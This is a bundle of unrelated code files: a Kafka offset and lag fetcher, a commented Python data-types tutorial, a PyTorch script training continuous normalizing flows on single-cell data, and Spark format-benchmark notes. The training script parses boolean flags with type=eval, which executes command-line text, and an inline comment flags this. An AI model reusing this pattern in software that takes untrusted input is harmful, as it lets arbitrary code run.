            partitions (list of TopicPartition): the partitions to fetch
        Returns:
            Future: resolves to dict of offsets: {TopicPartition: int}
        """
        assert self.config['api_version'] >= (0, 8, 1), 'Unsupported Broker API'
        assert all(map(lambda k: isinstance(k, TopicPartition), partitions))
        if not partitions:
            return Future().success({})
        elif self._coordinator_unknown():
            return Future().failure(Errors.GroupCoordinatorNotAvailableError)
        node_id = self._coordinator_id
        # Verify node is ready
        if not self._client.ready(node_id):
            log.debug("Node %s not ready -- failing offset fetch request",
                      node_id)
            return Future().failure(Errors.NodeNotReadyError)
        log.debug("Group %s fetching committed offsets for partitions: %s",
                  self.group_id, partitions)
        # construct the request: group partitions by topic
        topic_partitions = collections.defaultdict(set)
        for tp in partitions:
            topic_partitions[tp.topic].add(tp.partition)
        # v1 (0.8.2+) fetches from Kafka-stored offsets; v0 from ZooKeeper.
        if self.config['api_version'] >= (0, 8, 2):
            request = OffsetFetchRequest[1](
                self.group_id,
                list(topic_partitions.items())
            )
        else:
            request = OffsetFetchRequest[0](
                self.group_id,
                list(topic_partitions.items())
            )
        # send the request with a callback
        future = Future()
        _f = self._client.send(node_id, request)
        _f.add_callback(self._handle_offset_fetch_response, future)
        _f.add_errback(self._failed_request, node_id, request, future)
        return future

    def _handle_offset_fetch_response(self, future, response):
        """Translate an OffsetFetchResponse into {TopicPartition: OffsetAndMetadata}."""
        offsets = {}
        for topic, partitions in response.topics:
            for partition, offset, metadata, error_code in partitions:
                tp = TopicPartition(topic, partition)
                error_type = Errors.for_code(error_code)
                if error_type is not Errors.NoError:
                    error = error_type()
                    log.debug("Group %s failed to fetch offset for partition"
                              " %s: %s", self.group_id, tp, error)
                    if error_type is Errors.GroupLoadInProgressError:
                        # just retry
                        future.failure(error)
                    elif error_type is Errors.NotCoordinatorForGroupError:
                        # re-discover the coordinator and retry
                        self._coordinator_dead()
                        future.failure(error)
                    elif error_type in (Errors.UnknownMemberIdError,
                                        Errors.IllegalGenerationError):
                        future.failure(error)
                    elif error_type is Errors.UnknownTopicOrPartitionError:
                        log.warning("OffsetFetchRequest -- unknown topic %s"
                                    " (have you committed any offsets yet?)",
                                    topic)
                        continue
                    else:
                        log.error("Unknown error fetching offsets for %s: %s",
                                  tp, error)
                        future.failure(error)
                    # Abort on the first hard error (unknown topic merely skips).
                    return
                elif offset >= 0:
                    # record the position with the offset
                    # (-1 indicates no committed offset to fetch)
                    offsets[tp] = OffsetAndMetadata(offset, metadata)
                else:
                    log.debug("Group %s has no committed offset for partition"
                              " %s", self.group_id, tp)
        future.success(offsets)

    def get(self):
        """Return {partition_id: lag} for the configured topic.

        Lag is the log-end offset minus the committed offset (0 if nothing
        was ever committed). Returns {} and triggers a metadata update when
        no partitions are known yet.
        """
        topic_partitions = self._client.cluster.partitions_for_topic(self.topic)
        if not topic_partitions:
            future = self._client.cluster.request_update()
            log.info("No partitions available, performing metadata update.")
            self._client.poll(future=future)
            return {}
        partitions = [TopicPartition(self.topic, partition_id) for partition_id in topic_partitions]
        offsets = self.offsets(partitions, -1)
        committed = self.fetch_committed_offsets(partitions)
        lags = {}
        for tp, offset in six.iteritems(offsets):
            commit_offset = committed.get(tp, 0)
            # committed values are OffsetAndMetadata; fall back handles the int 0.
            numerical = commit_offset if isinstance(commit_offset, int) else commit_offset.offset
            lag = offset - numerical
            pid = tp.partition if isinstance(tp, TopicPartition) else tp
            log.debug("Lag for %s (%s): %s, %s, %s", self.topic, pid, offset, commit_offset, lag)
            lags[pid] = lag
        return lags
<filename>01_DataType.py
# 01_DataType.py -- Python data-type basics (strings, lists, sets, tuples,
# dicts, shallow vs. deep copy), annotated with expected output.

# '+' and '*' string operators
print('py''thon')  # python - adjacent string literals are implicitly concatenated
print('py' * 3)  # pypypy

# String indexing & slicing
tempStr = 'python'
print(tempStr[0])  # p
print(tempStr[5])  # n
print(tempStr[1:4])  # yth
print(tempStr[-2:])  # on

# Unicode
print('가')
print(type('가'))
print('가'.encode('utf-8'))
print(type('가'.encode('utf-8')))

# Lists
colors = ['red', 'green', 'gold']
print(colors)  # ['red', 'green', 'gold']
colors.append("blue")
print(colors)  # ['red', 'green', 'gold', 'blue']
colors.insert(1, 'black')
print(colors)  # ['red', 'black', 'green', 'gold', 'blue']
colors.extend(['white', 'gray'])
print(colors)  # ['red', 'black', 'green', 'gold', 'blue', 'white', 'gray']
print(colors.index("black"))  # 1
# index() raises if the value is absent from the search range:
# print(colors.index("black", 3, 4))  # ValueError: 'black' is not in list
colors.append('red')
print(colors.count('red'))  # 2
print(colors)  # ['red', 'black', 'green', 'gold', 'blue', 'white', 'gray', 'red']
print(colors.pop())  # red
print(colors)  # ['red', 'black', 'green', 'gold', 'blue', 'white', 'gray']

# Sets
a = {1, 2, 3}
b = {3, 4, 5}
print(a.union(b))  # union - {1, 2, 3, 4, 5}
print(a.intersection(b))  # intersection - {3}

# Tuples: swap two variables via packing/unpacking
c, d = 1, 2
print(c, d)  # 1 2
c, d = d, c
print(c, d)  # 2 1  (comment fixed: was wrongly annotated "2 2")

# Dictionaries
# color = dict(apple='red', banana='yello')
color = {'apple': 'red', 'banana': 'yello'}
print(color["apple"])  # red
color["apple"] = 'green'
print(color["apple"])  # green
print(color.keys())  # dict_keys(['apple', 'banana'])
print(color.values())  # dict_values(['green', 'yello'])
for k, v in color.items():
    print(k, v)  # apple green, banana yello
del color['apple']  # idiomatic form of color.__delitem__('apple')
print(color)  # {'banana': 'yello'}
color.clear()
print(color)  # {}
print('aaa')  # NOTE: stray debug print kept to preserve output

# Shallow copy vs. deep copy
from copy import copy, deepcopy
a = [1, [1, 2, 3]]
b = copy(a)
# Shallow copy: a new outer list is created, but both outer lists share the
# same inner objects.
print(id(a), id(b))  # BUG FIX: was id(a), id(a) -- these ids differ
print(id(a[0]), id(a[1]))
print(id(b[0]), id(b[1]))  # inner ids match a's
# Whether a change is shared depends on mutability: rebinding an immutable
# element only affects b; mutating the shared inner list affects both.
b[0] = 100  # immutable -> rebinds b[0] only
b[1][0] = 11  # mutable -> visible through a as well
print(a, b)  # [1, [11, 2, 3]] [100, [11, 2, 3]]  (comment fixed: showed stale values)
print(id(a[0]), id(a[1]))
print(id(b[0]), id(b[1]))  # b[0] now has a new id; b[1] still shared
# Deep copy: every contained object is copied recursively.
c = deepcopy(a)
print(id(a), id(c))  # different outer objects
print(id(a[0]), id(a[1]))
print(id(c[0]), id(c[1]))  # c[1] is a fresh list, independent of a[1]
<filename>train_scrna.py
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import argparse
import os
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import lib.utils as utils
from lib.visualize_flow import visualize_transform, visualize_growth
import lib.layers.odefunc as odefunc
from train_misc import standard_normal_logprob
from train_misc import set_cnf_options, count_nfe, count_parameters, count_total_time
from train_misc import add_spectral_norm, spectral_norm_power_iteration
from train_misc import create_regularization_fns, get_regularization, append_regularization_to_log
from train_misc import build_model_tabular
from diagnostics.viz_scrna import save_trajectory, trajectory_to_video, save_trajectory_density, save_vectors
# ---- Command-line configuration for the CNF trainer ----
# ODE solvers supported by the underlying torchdiffeq-style integrator.
SOLVERS = ["dopri5", "bdf", "rk4", "midpoint", 'adams', 'explicit_adams', 'fixed_adams']
parser = argparse.ArgumentParser('Continuous Normalizing Flow')
# NOTE(review): type=eval on boolean flags executes arbitrary CLI input;
# tolerable for a research script, but a str2bool helper would be safer.
parser.add_argument('--test', type=eval, default=False, choices=[True, False])
parser.add_argument('--full_data', type=eval, default=True, choices=[True, False])
parser.add_argument('--data', type=str, default='dummy')
parser.add_argument(
    "--layer_type", type=str, default="concatsquash",
    choices=["ignore", "concat", "concat_v2", "squash", "concatsquash", "concatcoord", "hyper", "blend"]
)
# Hidden-layer widths of the flow network, dash-separated.
parser.add_argument('--dims', type=str, default='64-64-64')
parser.add_argument("--num_blocks", type=int, default=1, help='Number of stacked CNFs.')
# Length of one integration interval between consecutive timepoints.
parser.add_argument('--time_length', type=float, default=0.5)
parser.add_argument('--train_T', type=eval, default=True)
parser.add_argument("--divergence_fn", type=str, default="brute_force", choices=["brute_force", "approximate"])
parser.add_argument("--nonlinearity", type=str, default="tanh", choices=odefunc.NONLINEARITIES)
parser.add_argument('--alpha', type=float, default=0.0, help="loss weight parameter for growth model")
# Solver and tolerance settings (separate overrides for evaluation).
parser.add_argument('--solver', type=str, default='dopri5', choices=SOLVERS)
parser.add_argument('--atol', type=float, default=1e-5)
parser.add_argument('--rtol', type=float, default=1e-5)
parser.add_argument("--step_size", type=float, default=None, help="Optional fixed step size.")
parser.add_argument('--test_solver', type=str, default=None, choices=SOLVERS + [None])
parser.add_argument('--test_atol', type=float, default=None)
parser.add_argument('--test_rtol', type=float, default=None)
parser.add_argument('--residual', type=eval, default=False, choices=[True, False])
parser.add_argument('--rademacher', type=eval, default=False, choices=[True, False])
parser.add_argument('--spectral_norm', type=eval, default=False, choices=[True, False])
parser.add_argument('--batch_norm', type=eval, default=False, choices=[True, False])
parser.add_argument('--bn_lag', type=float, default=0)
# Optimization hyperparameters.
parser.add_argument('--niters', type=int, default=10000)
parser.add_argument('--num_workers', type=int, default=8)
parser.add_argument('--batch_size', type=int, default=1000)
parser.add_argument('--test_batch_size', type=int, default=1000)
parser.add_argument('--viz_batch_size', type=int, default=2000)
parser.add_argument('--lr', type=float, default=1e-3)
parser.add_argument('--weight_decay', type=float, default=1e-5)
# Track quantities
parser.add_argument('--l1int', type=float, default=None, help="int_t ||f||_1")
parser.add_argument('--l2int', type=float, default=None, help="int_t ||f||_2")
parser.add_argument('--dl2int', type=float, default=None, help="int_t ||f^T df/dt||_2") # f df/dx???
parser.add_argument('--dtl2int', type=float, default=None, help="int_t ||f^T df/dx + df/dt||_2")
parser.add_argument('--JFrobint', type=float, default=None, help="int_t ||df/dx||_F")
parser.add_argument('--JdiagFrobint', type=float, default=None, help="int_t ||df_i/dx_i||_F")
parser.add_argument('--JoffdiagFrobint', type=float, default=None, help="int_t ||df/dx - df_i/dx_i||_F")
parser.add_argument('--vecint', type=float, default=None, help="regularize direction")
# Output / logging cadence.
parser.add_argument('--save', type=str, default='experiments/cnf')
parser.add_argument('--viz_freq', type=int, default=100)
parser.add_argument('--viz_freq_growth', type=int, default=100)
parser.add_argument('--val_freq', type=int, default=100)
parser.add_argument('--log_freq', type=int, default=10)
parser.add_argument('--gpu', type=int, default=0)
args = parser.parse_args()
# logger
utils.makedirs(args.save)
logger = utils.get_logger(logpath=os.path.join(args.save, 'logs'), filepath=os.path.abspath(__file__))
if args.layer_type == "blend":
    logger.info("!! Setting time_length from None to 1.0 due to use of Blend layers.")
    args.time_length = 1.0
logger.info(args)
device = torch.device('cuda:' + str(args.gpu) if torch.cuda.is_available() else 'cpu')
times = [args.time_length, 2*args.time_length]
import numpy as np
import atongtf.dataset as atd
from sklearn.preprocessing import StandardScaler
def load_data():
    """Load the subsampled EB velocity embedding, standardized per feature.

    Returns (embedding, sample_labels, fitted_scaler) for the rows selected
    by the dataset's 'ixs' index array.
    """
    dataset = atd.EB_Velocity_Dataset()
    keep = dataset.data['ixs']
    sample_labels = dataset.data['sample_labels'][keep]
    subset = dataset.emb[keep]
    scaler = StandardScaler().fit(subset)
    return scaler.transform(subset), sample_labels, scaler
def load_data_full():
    """Load the full EB velocity embedding (no subsampling), standardized.

    Returns (embedding, sample_labels, fitted_scaler).
    """
    dataset = atd.EB_Velocity_Dataset()
    sample_labels = dataset.data['sample_labels']
    scaler = StandardScaler().fit(dataset.emb)
    return scaler.transform(dataset.emb), sample_labels, scaler
def load_circle_data():
    """Synthetic circle-transition data.

    Returns (positions, labels, positions_with_directions) where the last
    array concatenates each position with its step to the next state.
    """
    dataset = atd.Circle_Transition_Dataset(n=10000)
    labels = dataset.get_train_labels()
    full = dataset.get_train()
    positions = full[:, :2]
    # Direction of motion = next state minus current state.
    step = full[:, 2:] - positions
    return positions, labels, np.concatenate([positions, step], axis=1)
def load_gaussian_pair_data():
    """Two 2-D Gaussian blobs (std 1/5) centered at x=0 and x=1.

    Returns (points, labels, None); each label equals its blob's x-center.
    """
    n = 10000
    spread = 1 / 5
    half = n // 2
    y = np.concatenate([np.zeros(half), np.ones(half)], axis=0)
    # First coordinate is centered on the label, second on zero.
    first = y + spread * np.random.randn(n)
    second = spread * np.random.randn(n)
    return np.stack([first, second], axis=1), y, None
def load_gaussian_curve_path():
    """Three unit-variance 2-D Gaussian blobs along the y-axis (y = 0, 0.5, 2).

    Returns (points, labels, None); each label is its blob's y-center.
    """
    n, dim = 15000, 2
    n -= n % 3  # make the three groups exactly equal-sized
    y = np.repeat([0, 0.5, 2], repeats=n // 3, axis=0)
    centers = np.stack([np.zeros_like(y), y], axis=1)
    return centers + np.random.randn(n, dim), y, None
def load_gaussian_data():
    """Single unit-variance 2-D Gaussian blob centered at (3, 0).

    Returns (points, all-zero labels, None).
    """
    n = 10000
    offset = 3 * np.stack([np.ones(n), np.zeros(n)], axis=1)
    return np.random.randn(n, 2) + offset, np.zeros(n), None
# ---- Dataset selection (alternative synthetic loaders kept for experiments) ----
#data, labels, _ = load_gaussian_curve_path()
#data, labels, _ = load_gaussian_pair_data()
"""
import scprep
fig, ax = plt.subplots(1,1)
scprep.plot.scatter2d(data, c=labels, ax=ax)
#scprep.plot.scatter2d(np.random.randn(10000,2), ax=ax)
ax.set_aspect('equal')
plt.savefig('gaussians.png')
plt.close()
"""
#data, labels, data_and_directions = load_circle_data()
# Active dataset: EB velocity embedding, full or subsampled per --full_data.
data, labels, scaler = load_data_full() if args.full_data else load_data()
# One entry per distinct timepoint label in the data.
timepoints = np.unique(labels)
#########
# SELECT TIMEPOINTS
#timepoints = timepoints[:2]
# Integration timepoints, where to evaluate the ODE
#int_tps = (timepoints+1) * args.time_length
# Evenly spaced multiples of time_length, one per timepoint (index-based,
# independent of the label values themselves).
int_tps = (np.arange(len(timepoints))+1.) * args.time_length
#########
def inf_sampler(arr, batch_size=None, noise=0.0):
    """Draw a random batch (with replacement) from arr, optionally jittered.

    batch_size defaults to args.batch_size; noise > 0 adds isotropic
    Gaussian jitter of that scale to the sampled rows.
    """
    if batch_size is None:
        batch_size = args.batch_size
    picks = np.random.randint(len(arr), size=batch_size)
    batch = arr[picks]
    if noise > 0:
        batch = batch + np.random.randn(*batch.shape) * noise
    return batch
def train_sampler(i):
    """Noisy training batch drawn from timepoint i (jitter scale 0.1)."""
    subset = data[labels == i, :]
    return inf_sampler(subset, noise=0.1)
def dir_train_sampler(i):
    """Noise-free batch of (position, direction) rows for timepoint i."""
    subset = data_and_directions[labels == i]
    return inf_sampler(subset, noise=0.)
def val_sampler(i):
    """Validation batch (size args.test_batch_size) from timepoint i."""
    subset = data[labels == i, :]
    return inf_sampler(subset, batch_size=args.test_batch_size)
def viz_sampler(i):
    """Visualization batch (size args.viz_batch_size) from timepoint i."""
    subset = data[labels == i, :]
    return inf_sampler(subset, batch_size=args.viz_batch_size)
full_sampler = lambda: inf_sampler(data, 2000)
def scatter_timepoints():
    """Save 'scatter.png': a 2x3 grid of 2D histograms, one panel per
    timepoint (noisy training samples) plus one panel of the full dataset."""
    import matplotlib.pyplot as plt
    # Plot window in standardized embedding coordinates.
    LOW = -4
    HIGH = 4
    fig, axes = plt.subplots(2,3, figsize=(20,10))
    axes = axes.flatten()
    titles = ['D00-03', 'D06-09', 'D12-15', 'D18-21', 'D24-27', 'Full']
    for i in range(5):
        ax = axes[i]
        # Concatenate 10 sampler batches to densify the histogram.
        dd = np.concatenate([train_sampler(i) for _ in range(10)])
        ax.hist2d(dd[:,0], dd[:,1], range=[[LOW,HIGH], [LOW,HIGH]], bins=100)
        ax.invert_yaxis()
        ax.set_aspect('equal')
        ax.set_title(titles[i])
    # Final panel: the entire dataset, all timepoints pooled.
    ax = axes[5]
    ax.hist2d(data[:,0], data[:,1], range=[[LOW,HIGH], [LOW,HIGH]], bins=100)
    ax.invert_yaxis()
    ax.set_aspect('equal')
    ax.set_title(titles[5])
    plt.savefig('scatter.png')
    plt.close()
#scatter_timepoints()
def get_transforms(model, integration_times):
    """
    Given a list of integration points,
    returns a function giving integration times

    sample_fn maps base-distribution samples forward through each interval
    (model called with reverse=True); density_fn maps data back to the base
    distribution by traversing the intervals in reverse order.
    """
    def sample_fn(z, logpz=None):
        # Each entry covers one interval [it - time_length, it].
        int_list = [torch.tensor([it - args.time_length, it]).type(torch.float32).to(device)
                    for it in integration_times]
        if logpz is not None:
            # TODO this works right?
            for it in int_list:
                z, logpz = model(z, logpz, integration_times=it, reverse=True)
            return z, logpz
        else:
            for it in int_list:
                z = model(z, integration_times=it, reverse=True)
            return z
    def density_fn(x, logpx=None):
        # Same intervals as sample_fn, traversed last-to-first.
        int_list = [torch.tensor([it - args.time_length, it]).type(torch.float32).to(device)
                    for it in integration_times[::-1]]
        if logpx is not None:
            for it in int_list:
                x, logpx = model(x, logpx, integration_times=it, reverse=False)
            return x, logpx
        else:
            for it in int_list:
                x = model(x, integration_times=it, reverse=False)
            return x
    return sample_fn, density_fn
def compute_loss(args, model, growth_model):
    """
    Compute loss by integrating backwards from the last time step
    At each time step integrate back one time step, and concatenate that
    to samples of the empirical distribution at that previous timestep
    repeating over and over to calculate the likelihood of samples in
    later timepoints iteratively, making sure that the ODE is evaluated
    at every time step to calculate those later points.
    The growth model is a single model of time independent cell growth /
    death rate defined as a variation from uniform.
    """
    # Backward pass accumulating losses, previous state and deltas
    deltas = []
    xs = []
    zs = []
    for i, (itp, tp) in enumerate(zip(int_tps[::-1], timepoints[::-1])): # tp counts down from last
        integration_times = torch.tensor([itp-args.time_length, itp]).type(torch.float32).to(device)
        # load data
        x = train_sampler(tp)
        x = torch.from_numpy(x).type(torch.float32).to(device)
        xs.append(x)
        if i > 0:
            # 'z' carries the state integrated back from the previous (later)
            # timepoint; stacking it in front of fresh samples lets its
            # likelihood keep propagating further back in time.
            x = torch.cat((z, x))
            zs.append(z)
        zero = torch.zeros(x.shape[0], 1).to(x)
        # transform to previous timepoint
        z, delta_logp = model(x, zero, integration_times=integration_times)
        deltas.append(delta_logp)
    # compute log growth probability
    xs = torch.cat(xs)
    #growth_zs, growth_delta_logps = growth_model(xs, torch.zeros(xs.shape[0], 1).to(xs)) # Use default timestep
    #growth_logpzs = uniform_logprob(growth_zs).sum(1, keepdim=True)
    #growth_logpzs = standard_normal_logprob(growth_zs).sum(1, keepdim=True)
    #growth_logpxs = growth_logpzs - growth_delta_logps
    # compute log q(z) with forward pass
    logpz = standard_normal_logprob(z).sum(1, keepdim=True)
    logps = [logpz]
    # build growth rates
    # First timepoint uses a unit growth rate; later ones are predicted from
    # (state, timepoint) pairs.
    growthrates = [torch.ones_like(logpz)]
    for z_state, tp in zip(zs[::-1], timepoints[::-1][1:]):
        full_state = torch.cat([z_state, tp * torch.ones(z_state.shape[0],1).to(z_state)], 1)
        growthrates.append(growth_model(full_state))
    losses = []
    for gr, delta_logp in zip(growthrates, deltas[::-1]):
        #logpx = logps[-1] - delta_logp# + gr
        logpx = logps[-1] - delta_logp + torch.log(gr)
        # Last args.batch_size rows are the fresh samples for this timepoint;
        # the rest are carried forward to later iterations.
        logps.append(logpx[:-args.batch_size])
        losses.append(-torch.mean(logpx[-args.batch_size:]))
    #weights = torch.tensor([1,1,10]).to(logpx)
    #weights = torch.tensor([2,1]).to(logpx)
    losses = torch.stack(losses)
    weights = torch.ones_like(losses).to(logpx)
    losses = torch.mean(losses * weights)
    #losses = torch.mean(losses)
    # Add a hinge loss on the growth model so that we prefer sums over the batch
    # to be not too much more than 1 on average
    # NOTE(review): 'reg' is computed below but never added to the loss --
    # every use is commented out; confirm whether that is intentional.
    reg = 0.
    for gr in growthrates[1:]:
        reg += F.relu(torch.mean(gr[-1000:])) # Only put a loss on the last portion with real data
        #reg += F.relu(torch.mean(gr[-1000:]) - 1) # Only put a loss on the last portion with real data
    #mean_growthrate = torch.mean(torch.cat(growthrates[1:]))
    #reg = F.relu(mean_growthrate - 1)
    #print(reg.item())
    #losses += 3*reg
    #losses += 0.001 * torch.mean(gr[-1000:] ** 2)
    # Direction regularization
    if args.vecint:
        # Penalize misalignment between the learned vector field and the
        # empirical (position, direction) pairs at each timepoint.
        similarity_loss = 0
        for i, (itp, tp) in enumerate(zip(int_tps, timepoints)):
            itp = torch.tensor(itp).type(torch.float32).to(device)
            x = dir_train_sampler(tp)
            x = torch.from_numpy(x).type(torch.float32).to(device)
            y,zz = torch.split(x, 2, dim=1)
            y = y + torch.randn_like(y) * 0.1
            # This is really hacky but I don't know a better way (alex)
            direction = model.chain[0].odefunc.odefunc.diffeq(itp, y)
            similarity_loss += 1 - torch.mean(F.cosine_similarity(direction, zz))
        print(similarity_loss)
        losses += similarity_loss * args.vecint
    #loss = loss + vec_reg_loss
    #growth_losses = -torch.mean(growth_logpxs)
    #alpha = torch.tensor(args.alpha).to(growth_losses)
    #loss = (1 - alpha) * losses + alpha * growth_losses
    #loss = losses + growth_losses
    return losses#, growth_losses
    #return loss
def train(args, model, growth_model):
    """Optimize the CNF `model` by maximum likelihood over the timepoint data.

    The growth model is held frozen (eval mode) throughout; only `model`'s
    parameters are updated.  Relies on module-level globals defined elsewhere
    in this file: `logger`, `regularization_coeffs`, `regularization_fns`,
    `timepoints`, `int_tps`, `viz_sampler`, `device`, and the helper
    functions imported at the top of the file.
    """
    logger.info(model)
    logger.info("Number of trainable parameters: {}".format(count_parameters(model)))

    # The growth model is deliberately excluded from the optimizer; it is only
    # evaluated inside compute_loss (see commented-out joint optimizer below).
    #optimizer = optim.Adam(set(model.parameters()) | set(growth_model.parameters()),
    optimizer = optim.Adam(model.parameters(),
                        lr=args.lr, weight_decay=args.weight_decay)
    #growth_optimizer = optim.Adam(growth_model.parameters(), lr=args.lr, weight_decay=args.weight_decay)

    # Exponential running averages (decay 0.93) used only for log output.
    # NFE = number of ODE function evaluations (forward / backward).
    time_meter = utils.RunningAverageMeter(0.93)
    loss_meter = utils.RunningAverageMeter(0.93)
    nfef_meter = utils.RunningAverageMeter(0.93)
    nfeb_meter = utils.RunningAverageMeter(0.93)
    tt_meter = utils.RunningAverageMeter(0.93)

    end = time.time()
    best_loss = float('inf')
    model.train()
    growth_model.eval()  # frozen for the whole run
    for itr in range(1, args.niters + 1):
        optimizer.zero_grad()
        #growth_optimizer.zero_grad()

        ### Train
        if args.spectral_norm: spectral_norm_power_iteration(model, 1)
        #if args.spectral_norm: spectral_norm_power_iteration(growth_model, 1)

        loss = compute_loss(args, model, growth_model)
        loss_meter.update(loss.item())

        if len(regularization_coeffs) > 0:
            # Only regularize on the last timepoint
            reg_states = get_regularization(model, regularization_coeffs)
            reg_loss = sum(
                reg_state * coeff for reg_state, coeff in zip(reg_states, regularization_coeffs) if coeff != 0
            )
            loss = loss + reg_loss
        #if len(growth_regularization_coeffs) > 0:
        #    growth_reg_states = get_regularization(growth_model, growth_regularization_coeffs)
        #    reg_loss = sum(
        #        reg_state * coeff for reg_state, coeff in zip(growth_reg_states, growth_regularization_coeffs) if coeff != 0
        #    )
        #    loss2 = loss2 + reg_loss

        # Snapshot forward-pass counters before backward() so the backward NFE
        # can be computed as the difference below.
        total_time = count_total_time(model)
        nfe_forward = count_nfe(model)

        loss.backward()
        #loss2.backward()
        optimizer.step()
        #growth_optimizer.step()

        ### Eval
        nfe_total = count_nfe(model)
        nfe_backward = nfe_total - nfe_forward
        nfef_meter.update(nfe_forward)
        nfeb_meter.update(nfe_backward)
        time_meter.update(time.time() - end)
        tt_meter.update(total_time)

        log_message = (
            'Iter {:04d} | Time {:.4f}({:.4f}) | Loss {:.6f}({:.6f}) | NFE Forward {:.0f}({:.1f})'
            ' | NFE Backward {:.0f}({:.1f}) | CNF Time {:.4f}({:.4f})'.format(
                itr, time_meter.val, time_meter.avg, loss_meter.val, loss_meter.avg, nfef_meter.val, nfef_meter.avg,
                nfeb_meter.val, nfeb_meter.avg, tt_meter.val, tt_meter.avg
            )
        )
        if len(regularization_coeffs) > 0:
            log_message = append_regularization_to_log(log_message, regularization_fns, reg_states)
        logger.info(log_message)

        # Periodic validation; checkpoint whenever the test loss improves.
        if itr % args.val_freq == 0 or itr == args.niters:
            with torch.no_grad():
                model.eval()
                growth_model.eval()
                test_loss = compute_loss(args, model, growth_model)
                test_nfe = count_nfe(model)
                log_message = '[TEST] Iter {:04d} | Test Loss {:.6f} | NFE {:.0f}'.format(itr, test_loss, test_nfe)
                logger.info(log_message)
                if test_loss.item() < best_loss:
                    best_loss = test_loss.item()
                    utils.makedirs(args.save)
                    torch.save({
                        'args': args,
                        'state_dict': model.state_dict(),
                        'growth_state_dict': growth_model.state_dict(),
                    }, os.path.join(args.save, 'checkpt.pth'))
                model.train()

        # Periodic visualization: one sample/density figure per timepoint,
        # transforming through the CNF integrated up to that timepoint.
        if itr % args.viz_freq == 0:
            with torch.no_grad():
                model.eval()
                for i, tp in enumerate(timepoints):
                    p_samples = viz_sampler(tp)
                    sample_fn, density_fn = get_transforms(model, int_tps[:i+1])
                    #growth_sample_fn, growth_density_fn = get_transforms(growth_model, int_tps[:i+1])
                    plt.figure(figsize=(9, 3))
                    visualize_transform(
                        p_samples, torch.randn, standard_normal_logprob, transform=sample_fn, inverse_transform=density_fn,
                        samples=True, npts=100, device=device
                    )
                    fig_filename = os.path.join(args.save, 'figs', '{:04d}_{:01d}.jpg'.format(itr, i))
                    utils.makedirs(os.path.dirname(fig_filename))
                    plt.savefig(fig_filename)
                    plt.close()
                    #visualize_transform(
                    #    p_samples, torch.rand, uniform_logprob, transform=growth_sample_fn,
                    #    inverse_transform=growth_density_fn,
                    #    samples=True, npts=800, device=device
                    #)
                    #fig_filename = os.path.join(args.save, 'growth_figs', '{:04d}_{:01d}.jpg'.format(itr, i))
                    #utils.makedirs(os.path.dirname(fig_filename))
                    #plt.savefig(fig_filename)
                    #plt.close()
                model.train()
        # Growth-model visualization is disabled (string literal, not executed).
        """
        if itr % args.viz_freq_growth == 0:
            with torch.no_grad():
                growth_model.eval()
                # Visualize growth transform
                growth_filename = os.path.join(args.save, 'growth', '{:04d}.jpg'.format(itr))
                utils.makedirs(os.path.dirname(growth_filename))
                visualize_growth(growth_model, data, labels, npts=200, device=device)
                plt.savefig(growth_filename)
                plt.close()
                growth_model.train()
        """
        end = time.time()
    logger.info('Training has finished.')
def plot_output(args, model, growth_model=None):
    """Render trajectory plots/videos for a trained model.

    Uses module-level globals defined elsewhere in this file: `logger`,
    `full_sampler`, `inf_sampler`, `data`, `labels`, `int_tps`, `device`.
    """
    save_traj_dir = os.path.join(args.save, 'trajectory')
    logger.info('Plotting trajectory to {}'.format(save_traj_dir))
    data_samples = full_sampler()
    # Seed the vector-field plot with 50 samples from the labels==0 timepoint.
    save_vectors(model, torch.tensor(inf_sampler(data[labels==0], batch_size=50)).type(torch.float32), data, labels,
                 args.save, device=device, end_times=int_tps, ntimes=100)
    save_trajectory(model, data_samples, save_traj_dir, device=device, end_times=int_tps, ntimes=25)
    trajectory_to_video(save_traj_dir)
    #density_dir = os.path.join(args.save, 'density2')
    #save_trajectory_density(model, data_samples, density_dir, device=device, end_times=int_tps, ntimes=100, memory=0.1)
    #trajectory_to_video(density_dir)

    # Growth-model plotting is disabled by the 'False and' guard left in place
    # by the author; the body is kept for reference.
    if False and growth_model is not None:
        print('Plotting growth model')
        growth_filename = os.path.join(args.save, 'growth.jpg')
        utils.makedirs(os.path.dirname(growth_filename))
        visualize_growth(growth_model, data, labels, npts=200, device=device)
        plt.savefig(growth_filename)
        plt.close()
    #save_traj_dir2 = os.path.join(args.save, 'trajectory_to_end')
    #save_trajectory(model, data_samples, save_traj_dir2, device=device, end_times=[int_tps[-1]], ntimes=25)
    #trajectory_to_video(save_traj_dir2)
class GrowthNet(nn.Module):
    """Small MLP mapping a 3-d input (e.g. x, y, t) to one scalar growth value."""

    def __init__(self):
        super().__init__()
        # Attribute names fc1..fc3 are kept so existing state_dicts still load.
        self.fc1 = nn.Linear(3, 64)
        self.fc2 = nn.Linear(64, 64)
        self.fc3 = nn.Linear(64, 1)

    def forward(self, x):
        """Return the unbounded scalar output for each row of `x`."""
        hidden = F.leaky_relu(self.fc1(x))
        hidden = F.leaky_relu(self.fc2(hidden))
        return self.fc3(hidden)
if __name__ == '__main__':
    # Build the main CNF and its regularizers (`args`, `device`,
    # `build_model_tabular`, etc. are module globals defined earlier).
    regularization_fns, regularization_coeffs = create_regularization_fns(args)
    growth_regularization_fns, growth_regularization_coeffs = create_regularization_fns(args)
    model = build_model_tabular(args, 2, regularization_fns).to(device)
    # The growth model is loaded pre-trained instead of being built/trained here.
    growth_model = torch.load('growth_model_v2.ckpt').to(device)

    if args.spectral_norm: add_spectral_norm(model)
    set_cnf_options(args, model)

    if args.test:
        # Evaluation mode: restore both models from the checkpoint.
        # Load the checkpoint once and reuse it (previously the file was
        # re-read a second time for the growth model).
        state_dict = torch.load(args.save + '/checkpt.pth')
        model.load_state_dict(state_dict['state_dict'])
        if 'growth_state_dict' not in state_dict:
            # Fixed message typo: "note in save" -> "not in save".
            print('error growth model not in save')
            growth_model = None
        else:
            growth_model.load_state_dict(state_dict['growth_state_dict'])
    else:
        train(args, model, growth_model)
    # Plot in both modes (test mode would otherwise load and do nothing).
    plot_output(args, model, growth_model)
|
<filename>jobs/script.py
# spark-submit --packages org.apache.spark:spark-avro_2.12:3.0.1 script.py csv random_batch
# spark-submit --packages org.apache.spark:spark-avro_2.12:3.0.1 script.py parquet write
# du prints kb
# orc 191332 kb
# avro 286628 kb
# parquet 202772 kb
# csv 483432 kb
# json 1292192 kb
# write speed
# orc: 16.25 sec
# avro, write, 13.56
# parquet, write, 13.64
# json, write, 58.96
# csv, write, 13.25
